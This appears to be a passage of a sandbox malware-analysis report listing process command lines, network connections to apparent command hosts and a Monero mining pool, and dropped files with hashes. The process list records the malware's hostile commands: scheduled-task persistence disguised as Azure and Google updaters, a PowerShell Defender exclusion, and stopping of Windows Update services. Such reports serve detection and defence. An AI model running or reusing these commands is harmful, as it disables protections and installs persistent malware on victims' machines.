/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\09b38451-d3bf-4da3-abdc-ba2bde48b956\build2.exe

"C:\Users\Admin\AppData\Local\09b38451-d3bf-4da3-abdc-ba2bde48b956\build2.exe"

C:\Users\Admin\AppData\Local\09b38451-d3bf-4da3-abdc-ba2bde48b956\build2.exe

"C:\Users\Admin\AppData\Local\09b38451-d3bf-4da3-abdc-ba2bde48b956\build2.exe"

C:\Users\Admin\AppData\Local\09b38451-d3bf-4da3-abdc-ba2bde48b956\build3.exe

"C:\Users\Admin\AppData\Local\09b38451-d3bf-4da3-abdc-ba2bde48b956\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5040 -ip 5040

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 1964

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3716 -ip 3716

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3716 -s 1016

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2248 -ip 2248

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 1728

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 744 -ip 744

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 744 -s 1752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3620 -ip 3620

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 1732

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4620 -ip 4620

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 1744

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4500 -ip 4500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 1732

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 potunulit.org udp
US 188.114.97.0:80 potunulit.org tcp
US 8.8.8.8:53 colisumy.com udp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
AR 190.224.203.37:80 colisumy.com tcp
US 8.8.8.8:53 37.203.224.190.in-addr.arpa udp
US 8.8.8.8:53 carrieremaken.com udp
US 181.214.31.34:443 carrieremaken.com tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 34.31.214.181.in-addr.arpa udp
US 95.214.25.207:3003 95.214.25.207 tcp
US 8.8.8.8:53 207.25.214.95.in-addr.arpa udp
AR 190.224.203.37:80 colisumy.com tcp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
RU 79.137.192.18:80 79.137.192.18 tcp
US 8.8.8.8:53 18.192.137.79.in-addr.arpa udp
US 8.8.8.8:53 us.imgjeoigaa.com udp
HK 103.100.211.218:80 us.imgjeoigaa.com tcp
US 8.8.8.8:53 218.211.100.103.in-addr.arpa udp
MD 176.123.9.142:14845 tcp
US 8.8.8.8:53 142.9.123.176.in-addr.arpa udp
US 95.214.25.207:3003 95.214.25.207 tcp
US 8.8.8.8:53 aa.imgjeoogbb.com udp
HK 154.221.26.108:80 aa.imgjeoogbb.com tcp
AR 190.224.203.37:80 colisumy.com tcp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
RU 79.137.192.18:80 79.137.192.18 tcp
US 8.8.8.8:53 203.151.224.20.in-addr.arpa udp
US 8.8.8.8:53 api.2ip.ua udp
NL 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 254.217.0.162.in-addr.arpa udp
US 8.8.8.8:53 101.14.18.104.in-addr.arpa udp
US 8.8.8.8:53 101.15.18.104.in-addr.arpa udp
NL 162.0.217.254:443 api.2ip.ua tcp
NL 162.0.217.254:443 api.2ip.ua tcp
NL 162.0.217.254:443 api.2ip.ua tcp
NL 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 greenbi.net udp
EG 156.219.106.179:80 greenbi.net tcp
US 8.8.8.8:53 179.106.219.156.in-addr.arpa udp
EG 156.219.106.179:80 greenbi.net tcp
EG 156.219.106.179:80 greenbi.net tcp
EG 156.219.106.179:80 greenbi.net tcp
EG 156.219.106.179:80 greenbi.net tcp
EG 156.219.106.179:80 greenbi.net tcp
NL 162.0.217.254:443 api.2ip.ua tcp
EG 156.219.106.179:80 greenbi.net tcp
EG 156.219.106.179:80 greenbi.net tcp
EG 156.219.106.179:80 greenbi.net tcp
EG 156.219.106.179:80 greenbi.net tcp
NL 162.0.217.254:443 api.2ip.ua tcp
EG 156.219.106.179:80 greenbi.net tcp
EG 156.219.106.179:80 greenbi.net tcp
EG 156.219.106.179:80 greenbi.net tcp
EG 156.219.106.179:80 greenbi.net tcp
EG 156.219.106.179:80 greenbi.net tcp
EG 156.219.106.179:80 greenbi.net tcp
NL 162.0.217.254:443 api.2ip.ua tcp
NL 162.0.217.254:443 api.2ip.ua tcp
NL 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 colisumy.com udp
US 8.8.8.8:53 zexeq.com udp
HU 84.224.216.79:80 zexeq.com tcp
KW 168.187.75.100:80 zexeq.com tcp
KW 168.187.75.100:80 zexeq.com tcp
HU 84.224.216.79:80 zexeq.com tcp
NL 162.0.217.254:443 api.2ip.ua tcp
KW 168.187.75.100:80 zexeq.com tcp
US 8.8.8.8:53 100.75.187.168.in-addr.arpa udp
US 8.8.8.8:53 79.216.224.84.in-addr.arpa udp
RU 79.137.192.18:80 79.137.192.18 tcp
HU 84.224.216.79:80 zexeq.com tcp
HU 84.224.216.79:80 zexeq.com tcp
US 8.8.8.8:53 colisumy.com udp
AR 181.230.206.248:80 colisumy.com tcp
US 8.8.8.8:53 zexeq.com udp
HU 84.224.216.79:80 zexeq.com tcp
US 8.8.8.8:53 248.206.230.181.in-addr.arpa udp
HU 84.224.216.79:80 zexeq.com tcp
US 8.8.8.8:53 aa.imgjeoogbb.com udp
HK 154.221.26.108:80 aa.imgjeoogbb.com tcp
US 8.8.8.8:53 api.2ip.ua udp
NL 162.0.217.254:443 api.2ip.ua tcp
AR 181.230.206.248:80 colisumy.com tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
NL 51.15.58.224:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 t.me udp
US 8.8.8.8:53 170.34.67.172.in-addr.arpa udp
US 8.8.8.8:53 224.58.15.51.in-addr.arpa udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
NL 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 zexeq.com udp
US 8.8.8.8:53 23.249.124.192.in-addr.arpa udp
KR 175.119.10.231:80 zexeq.com tcp
AR 181.230.206.248:80 colisumy.com tcp
US 8.8.8.8:53 231.10.119.175.in-addr.arpa udp
NL 162.0.217.254:443 api.2ip.ua tcp
DE 5.75.171.168:27002 5.75.171.168 tcp
AR 181.230.206.248:80 colisumy.com tcp
US 8.8.8.8:53 168.171.75.5.in-addr.arpa udp
KR 175.119.10.231:80 zexeq.com tcp
KR 175.119.10.231:80 zexeq.com tcp
NL 149.154.167.99:443 t.me tcp
DE 5.75.171.168:27002 5.75.171.168 tcp
NL 149.154.167.99:443 t.me tcp
DE 5.75.171.168:27002 5.75.171.168 tcp
NL 149.154.167.99:443 t.me tcp
DE 5.75.171.168:27002 5.75.171.168 tcp
RU 79.137.192.18:80 79.137.192.18 tcp
NL 149.154.167.99:443 t.me tcp
DE 5.75.171.168:27002 5.75.171.168 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
DE 5.75.171.168:27002 5.75.171.168 tcp
NL 149.154.167.99:443 t.me tcp
DE 5.75.171.168:27002 5.75.171.168 tcp

Files

memory/1972-134-0x0000000002540000-0x0000000002640000-memory.dmp

memory/1972-135-0x00000000024A0000-0x00000000024A9000-memory.dmp

memory/1972-136-0x0000000000400000-0x00000000022F7000-memory.dmp

memory/3144-137-0x0000000002B90000-0x0000000002BA6000-memory.dmp

memory/1972-138-0x0000000000400000-0x00000000022F7000-memory.dmp

memory/1972-141-0x00000000024A0000-0x00000000024A9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3302.exe

MD5 2475ec85193247eebd6fabd88ed25130
SHA1 da415fbf5ccedc8761b4438ac5818483e1b37fa9
SHA256 36711de0c30b8b0984d9848a18c0c78c6e7116df10e26bac1773c592cd395c8a
SHA512 6cea1493cfb0343cf5c4d11bdbaf6f627944714dcddcf39581142b96200fa0c6cb44abb9b06a94117aa96f8fbbab4f8fdd450ea3d27f911fcc581b9e0b0a1219

C:\Users\Admin\AppData\Local\Temp\3302.exe

MD5 2475ec85193247eebd6fabd88ed25130
SHA1 da415fbf5ccedc8761b4438ac5818483e1b37fa9
SHA256 36711de0c30b8b0984d9848a18c0c78c6e7116df10e26bac1773c592cd395c8a
SHA512 6cea1493cfb0343cf5c4d11bdbaf6f627944714dcddcf39581142b96200fa0c6cb44abb9b06a94117aa96f8fbbab4f8fdd450ea3d27f911fcc581b9e0b0a1219

C:\Users\Admin\AppData\Local\Temp\366E.dll

MD5 d70e50962b1d5ecff90868916568100e
SHA1 db9daf267c3d92df4840fe388b787d5e7dc56f9e
SHA256 de1d61643576b247962b95327895cf7c137019853330a405b173ba25a0281e4b
SHA512 f11fd52c5bd8021cca6a5f8d324d183915cb60893e4a8ecef7cb3455cb2fa2079ce8093daa35f812d31bb46a231bbaa023dba1341b5a33a1954caae4e8b090bf

C:\Users\Admin\AppData\Local\Temp\3824.dll

MD5 d70e50962b1d5ecff90868916568100e
SHA1 db9daf267c3d92df4840fe388b787d5e7dc56f9e
SHA256 de1d61643576b247962b95327895cf7c137019853330a405b173ba25a0281e4b
SHA512 f11fd52c5bd8021cca6a5f8d324d183915cb60893e4a8ecef7cb3455cb2fa2079ce8093daa35f812d31bb46a231bbaa023dba1341b5a33a1954caae4e8b090bf

C:\Users\Admin\AppData\Local\Temp\366E.dll

MD5 d70e50962b1d5ecff90868916568100e
SHA1 db9daf267c3d92df4840fe388b787d5e7dc56f9e
SHA256 de1d61643576b247962b95327895cf7c137019853330a405b173ba25a0281e4b
SHA512 f11fd52c5bd8021cca6a5f8d324d183915cb60893e4a8ecef7cb3455cb2fa2079ce8093daa35f812d31bb46a231bbaa023dba1341b5a33a1954caae4e8b090bf

C:\Users\Admin\AppData\Local\Temp\3824.dll

MD5 d70e50962b1d5ecff90868916568100e
SHA1 db9daf267c3d92df4840fe388b787d5e7dc56f9e
SHA256 de1d61643576b247962b95327895cf7c137019853330a405b173ba25a0281e4b
SHA512 f11fd52c5bd8021cca6a5f8d324d183915cb60893e4a8ecef7cb3455cb2fa2079ce8093daa35f812d31bb46a231bbaa023dba1341b5a33a1954caae4e8b090bf

memory/5032-156-0x0000000002700000-0x0000000002944000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3824.dll

MD5 d70e50962b1d5ecff90868916568100e
SHA1 db9daf267c3d92df4840fe388b787d5e7dc56f9e
SHA256 de1d61643576b247962b95327895cf7c137019853330a405b173ba25a0281e4b
SHA512 f11fd52c5bd8021cca6a5f8d324d183915cb60893e4a8ecef7cb3455cb2fa2079ce8093daa35f812d31bb46a231bbaa023dba1341b5a33a1954caae4e8b090bf

memory/4688-159-0x0000000000400000-0x0000000000644000-memory.dmp

memory/5032-158-0x0000000002700000-0x0000000002944000-memory.dmp

memory/5032-157-0x0000000000D70000-0x0000000000D76000-memory.dmp

memory/4688-160-0x0000000000AB0000-0x0000000000AB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3D65.exe

MD5 23500d2528c34a2c75782a0fccbd880f
SHA1 5dc88f3f40c51489c1f7ae66d862d4047ef98a57
SHA256 2436580f50aa36271e880c712fbedd18fbcfe9d854274829301f67f782950305
SHA512 f8a6fea58f595c1843fc8418382a48cf81730c12212b52eb1f75be71cf72ae5b0d104608a34f3c072ee6fd01e84c74eeb58a9669a0c9d7df813e0fa9b169e66f

C:\Users\Admin\AppData\Local\Temp\3D65.exe

MD5 23500d2528c34a2c75782a0fccbd880f
SHA1 5dc88f3f40c51489c1f7ae66d862d4047ef98a57
SHA256 2436580f50aa36271e880c712fbedd18fbcfe9d854274829301f67f782950305
SHA512 f8a6fea58f595c1843fc8418382a48cf81730c12212b52eb1f75be71cf72ae5b0d104608a34f3c072ee6fd01e84c74eeb58a9669a0c9d7df813e0fa9b169e66f

C:\Users\Admin\AppData\Local\Temp\40B2.exe

MD5 475b6fa46a9760f93e26085d68fa802b
SHA1 327dbd8241d7f02608b0dd464a7ca98db4306efd
SHA256 e6b243bb67b16d704a5bc586422f084f411f1cd3db3778f112ff74520bdb1be3
SHA512 2dc51a122fb301e342e7a13fd964b4e84f6dcebd6c8dfd086dcf41425f21558591a144b6c370c1119e23ebe357f496df11e65c5ee3a8677866c01d9e6343bc66

C:\Users\Admin\AppData\Local\Temp\40B2.exe

MD5 475b6fa46a9760f93e26085d68fa802b
SHA1 327dbd8241d7f02608b0dd464a7ca98db4306efd
SHA256 e6b243bb67b16d704a5bc586422f084f411f1cd3db3778f112ff74520bdb1be3
SHA512 2dc51a122fb301e342e7a13fd964b4e84f6dcebd6c8dfd086dcf41425f21558591a144b6c370c1119e23ebe357f496df11e65c5ee3a8677866c01d9e6343bc66

C:\Users\Admin\AppData\Local\Temp\4268.exe

MD5 475b6fa46a9760f93e26085d68fa802b
SHA1 327dbd8241d7f02608b0dd464a7ca98db4306efd
SHA256 e6b243bb67b16d704a5bc586422f084f411f1cd3db3778f112ff74520bdb1be3
SHA512 2dc51a122fb301e342e7a13fd964b4e84f6dcebd6c8dfd086dcf41425f21558591a144b6c370c1119e23ebe357f496df11e65c5ee3a8677866c01d9e6343bc66

C:\Users\Admin\AppData\Local\Temp\4268.exe

MD5 475b6fa46a9760f93e26085d68fa802b
SHA1 327dbd8241d7f02608b0dd464a7ca98db4306efd
SHA256 e6b243bb67b16d704a5bc586422f084f411f1cd3db3778f112ff74520bdb1be3
SHA512 2dc51a122fb301e342e7a13fd964b4e84f6dcebd6c8dfd086dcf41425f21558591a144b6c370c1119e23ebe357f496df11e65c5ee3a8677866c01d9e6343bc66

C:\Users\Admin\AppData\Local\Temp\5AE3.exe

MD5 2475ec85193247eebd6fabd88ed25130
SHA1 da415fbf5ccedc8761b4438ac5818483e1b37fa9
SHA256 36711de0c30b8b0984d9848a18c0c78c6e7116df10e26bac1773c592cd395c8a
SHA512 6cea1493cfb0343cf5c4d11bdbaf6f627944714dcddcf39581142b96200fa0c6cb44abb9b06a94117aa96f8fbbab4f8fdd450ea3d27f911fcc581b9e0b0a1219

C:\Users\Admin\AppData\Local\Temp\5AE3.exe

MD5 2475ec85193247eebd6fabd88ed25130
SHA1 da415fbf5ccedc8761b4438ac5818483e1b37fa9
SHA256 36711de0c30b8b0984d9848a18c0c78c6e7116df10e26bac1773c592cd395c8a
SHA512 6cea1493cfb0343cf5c4d11bdbaf6f627944714dcddcf39581142b96200fa0c6cb44abb9b06a94117aa96f8fbbab4f8fdd450ea3d27f911fcc581b9e0b0a1219

C:\Users\Admin\AppData\Local\Temp\5EFB.exe

MD5 c2ca868ecfdd5ee7a6d4143890a29872
SHA1 004c581ea52c199b9aa3150f282aeb99d79104cc
SHA256 d440158b91d965693007b539131704b3bdd72e864b5adc1c0e230213acd3d97b
SHA512 2be918feea01882fe48cffd1df55a7cfe106f94dd20f6aa972728ddc00056aaabfd1fa493847844ac0746fd4b47818f284d4b4029d432330c0d8f60792e81ce2

C:\Users\Admin\AppData\Local\Temp\5EFB.exe

MD5 c2ca868ecfdd5ee7a6d4143890a29872
SHA1 004c581ea52c199b9aa3150f282aeb99d79104cc
SHA256 d440158b91d965693007b539131704b3bdd72e864b5adc1c0e230213acd3d97b
SHA512 2be918feea01882fe48cffd1df55a7cfe106f94dd20f6aa972728ddc00056aaabfd1fa493847844ac0746fd4b47818f284d4b4029d432330c0d8f60792e81ce2

memory/4688-182-0x0000000000400000-0x0000000000644000-memory.dmp

memory/4688-185-0x0000000002CC0000-0x0000000002DB7000-memory.dmp

memory/5032-184-0x0000000002700000-0x0000000002944000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\61EA.exe

MD5 7ed51300b0d9bd97b8bde707172908ab
SHA1 ca4dcfeb839b1c385236ddf4fb38e9d5b77d1dcf
SHA256 0fc441db7d149acefd04cd2c29968aefb9a8ef7f1e4b52e5dcd3e64b620be87b
SHA512 115b53f410fa88244ecedbf6f22430b3e1b2ea8f1f686ec4e5deb328a5aa90b12a958fbc7b1d2747b522029d4ea9eb4d5c6825dd5ae4f9c9578bb500a49139c1

memory/5032-189-0x0000000002B80000-0x0000000002C77000-memory.dmp

memory/468-191-0x00000000747C0000-0x0000000074F70000-memory.dmp

memory/468-190-0x00000000003E0000-0x0000000000484000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\64AA.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

C:\Users\Admin\AppData\Local\Temp\64AA.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

C:\Users\Admin\AppData\Local\Temp\61EA.exe

MD5 7ed51300b0d9bd97b8bde707172908ab
SHA1 ca4dcfeb839b1c385236ddf4fb38e9d5b77d1dcf
SHA256 0fc441db7d149acefd04cd2c29968aefb9a8ef7f1e4b52e5dcd3e64b620be87b
SHA512 115b53f410fa88244ecedbf6f22430b3e1b2ea8f1f686ec4e5deb328a5aa90b12a958fbc7b1d2747b522029d4ea9eb4d5c6825dd5ae4f9c9578bb500a49139c1

memory/4688-199-0x0000000002DC0000-0x0000000002E9E000-memory.dmp

memory/5096-203-0x0000000000590000-0x00000000005C0000-memory.dmp

memory/5096-202-0x0000000000400000-0x000000000043F000-memory.dmp

memory/5032-209-0x0000000002C80000-0x0000000002D5E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6E21.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

C:\Users\Admin\AppData\Local\Temp\6E21.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

memory/4688-214-0x0000000002DC0000-0x0000000002E9E000-memory.dmp

memory/5032-215-0x0000000002C80000-0x0000000002D5E000-memory.dmp

memory/5096-216-0x00000000747C0000-0x0000000074F70000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\78EF.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

C:\Users\Admin\AppData\Local\Temp\78EF.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

memory/4688-223-0x0000000002DC0000-0x0000000002E9E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

MD5 c7b401d619b0faaef225ea869d8b1e3d
SHA1 e0dc66a08d27d91d25ff67588b9671164f95b885
SHA256 8897fe3056c84f9fffe815153fbc04bce159c8c4e913c74648c64ad84d3f1f25
SHA512 5144d42da3595d7741889172ef0a4109395f92b91d8d904667a3e4e998e838616b49cb863331c311eb4e17cf17eaf64e80b9aca02fb3238af1ed8edd3c4caa0b

C:\Users\Admin\AppData\Local\Temp\78EF.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

memory/5032-226-0x0000000002C80000-0x0000000002D5E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestplayer.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

MD5 c7b401d619b0faaef225ea869d8b1e3d
SHA1 e0dc66a08d27d91d25ff67588b9671164f95b885
SHA256 8897fe3056c84f9fffe815153fbc04bce159c8c4e913c74648c64ad84d3f1f25
SHA512 5144d42da3595d7741889172ef0a4109395f92b91d8d904667a3e4e998e838616b49cb863331c311eb4e17cf17eaf64e80b9aca02fb3238af1ed8edd3c4caa0b

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

MD5 c7b401d619b0faaef225ea869d8b1e3d
SHA1 e0dc66a08d27d91d25ff67588b9671164f95b885
SHA256 8897fe3056c84f9fffe815153fbc04bce159c8c4e913c74648c64ad84d3f1f25
SHA512 5144d42da3595d7741889172ef0a4109395f92b91d8d904667a3e4e998e838616b49cb863331c311eb4e17cf17eaf64e80b9aca02fb3238af1ed8edd3c4caa0b

memory/5096-236-0x0000000004AF0000-0x0000000005108000-memory.dmp

memory/1892-235-0x00007FF7E0070000-0x00007FF7E00C2000-memory.dmp

memory/5096-241-0x0000000005110000-0x000000000521A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestplayer.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\latestplayer.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

memory/468-244-0x00000000747C0000-0x0000000074F70000-memory.dmp

memory/5096-246-0x0000000005220000-0x0000000005232000-memory.dmp

memory/5096-245-0x0000000004AE0000-0x0000000004AF0000-memory.dmp

memory/5096-247-0x0000000005240000-0x000000000527C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\8F29.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

C:\Users\Admin\AppData\Local\Temp\8F29.exe

